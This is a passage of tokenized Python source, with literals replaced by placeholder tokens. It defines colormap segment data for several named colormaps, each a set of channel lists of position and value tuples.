<NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT:0.5> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT:1.0> , <NUM_LIT> , <NUM_LIT> ) ] , <EOL> '<STR_LIT>' : [ <EOL> ( <NUM_LIT:0.0> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT:0.5> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT:1.0> , <NUM_LIT> , <NUM_LIT> ) ] <EOL> } <EOL> _BlueBrown10_data = { <EOL> '<STR_LIT>' : [ <EOL> ( <NUM_LIT:0.0> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT:1.0> , <NUM_LIT> , <NUM_LIT> ) ] , <EOL> '<STR_LIT>' : [ <EOL> ( <NUM_LIT:0.0> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT:1.0> , <NUM_LIT> , <NUM_LIT> ) ] , <EOL> '<STR_LIT>' : [ <EOL> ( <NUM_LIT:0.0> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT:1.0> , <NUM_LIT> , <NUM_LIT> ) ] <EOL> } <EOL> _BlueBrown11_data = { <EOL> '<STR_LIT>' : [ <EOL> ( <NUM_LIT:0.0> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT:0.5> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT:1.0> , <NUM_LIT> , <NUM_LIT> ) ] , <EOL> '<STR_LIT>' : [ <EOL> ( <NUM_LIT:0.0> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT:0.5> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT:1.0> , <NUM_LIT> , <NUM_LIT> ) ] , <EOL> '<STR_LIT>' : [ <EOL> ( <NUM_LIT:0.0> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT:0.5> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT:1.0> , <NUM_LIT> , <NUM_LIT> ) ] <EOL> } <EOL> _Theodore16_data = { <EOL> '<STR_LIT>' : [ <EOL> ( <NUM_LIT:0.0> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:0.0> , <NUM_LIT:0.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT:1.0> , <NUM_LIT> , <NUM_LIT> ) ] , <EOL> '<STR_LIT>' : [ <EOL> ( <NUM_LIT:0.0> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT:1.0> , <NUM_LIT> , <NUM_LIT> ) ] , <EOL> '<STR_LIT>' : [ <EOL> ( <NUM_LIT:0.0> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT:1.0> , <NUM_LIT> , <NUM_LIT> ) ] <EOL> } <EOL> _EWilson17_data = { <EOL> '<STR_LIT>' : [ <EOL> ( <NUM_LIT:0.0> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:0.0> , <NUM_LIT:0.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:0.0> , <NUM_LIT:0.0> ) , <EOL> ( <NUM_LIT:0.5> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:0.0> , <NUM_LIT:0.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:0.0> , <NUM_LIT:0.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:0.0> , <NUM_LIT:0.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT:1.0> , <NUM_LIT:0.0> , <NUM_LIT:0.0> ) ] , <EOL> '<STR_LIT>' : [ <EOL> ( <NUM_LIT:0.0> , <NUM_LIT:0.0> , <NUM_LIT:0.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:0.0> , <NUM_LIT:0.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT:0.5> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT:1.0> , <NUM_LIT:0.0> , <NUM_LIT:0.0> ) ] , <EOL> '<STR_LIT>' : [ <EOL> ( <NUM_LIT:0.0> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:0.0> , <NUM_LIT:0.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:0.0> , <NUM_LIT:0.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:0.0> , <NUM_LIT:0.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:0.0> , <NUM_LIT:0.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:0.0> , <NUM_LIT:0.0> ) , <EOL> ( <NUM_LIT:0.5> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT:1.0> , <NUM_LIT> , <NUM_LIT> ) ] <EOL> } <EOL> _Wild25_data = { <EOL> '<STR_LIT>' : [ <EOL> ( <NUM_LIT:0.0> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT:0.5> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:0.0> , <NUM_LIT:0.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:0.0> , <NUM_LIT:0.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:0.0> , <NUM_LIT:0.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:0.0> , <NUM_LIT:0.0> ) , <EOL> ( <NUM_LIT:1.0> , <NUM_LIT:0.0> , <NUM_LIT:0.0> ) ] , <EOL> '<STR_LIT>' : [ <EOL> ( <NUM_LIT:0.0> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT:0.5> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:0.0> , <NUM_LIT:0.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:0.0> , <NUM_LIT:0.0> ) , <EOL> ( <NUM_LIT:1.0> , <NUM_LIT:0.0> , <NUM_LIT:0.0> ) ] , <EOL> '<STR_LIT>' : [ <EOL> ( <NUM_LIT:0.0> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT:0.5> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT:1.0> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) ] <EOL> } <EOL> _SCook18_data = { <EOL> '<STR_LIT>' : [ <EOL> ( <NUM_LIT:0.0> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT:1.0> , <NUM_LIT> , <NUM_LIT> ) ] , <EOL> '<STR_LIT>' : [ <EOL> ( <NUM_LIT:0.0> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT:1.0> , <NUM_LIT> , <NUM_LIT> ) ] , <EOL> '<STR_LIT>' : [ <EOL> ( <NUM_LIT:0.0> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT:1.0> , <NUM_LIT> , <NUM_LIT> ) ] <EOL> } <EOL> _PD17_data = { <EOL> '<STR_LIT>' : [ <EOL> ( <NUM_LIT:0.0> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:0.0> , <NUM_LIT:0.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT:0.5> , <NUM_LIT:0.0> , <NUM_LIT:0.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT:1.0> , <NUM_LIT> , <NUM_LIT> ) ] , <EOL> '<STR_LIT>' : [ <EOL> ( <NUM_LIT:0.0> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT:0.5> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT:1.0> , <NUM_LIT> , <NUM_LIT> ) ] , <EOL> '<STR_LIT>' : [ <EOL> ( <NUM_LIT:0.0> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT:0.5> , 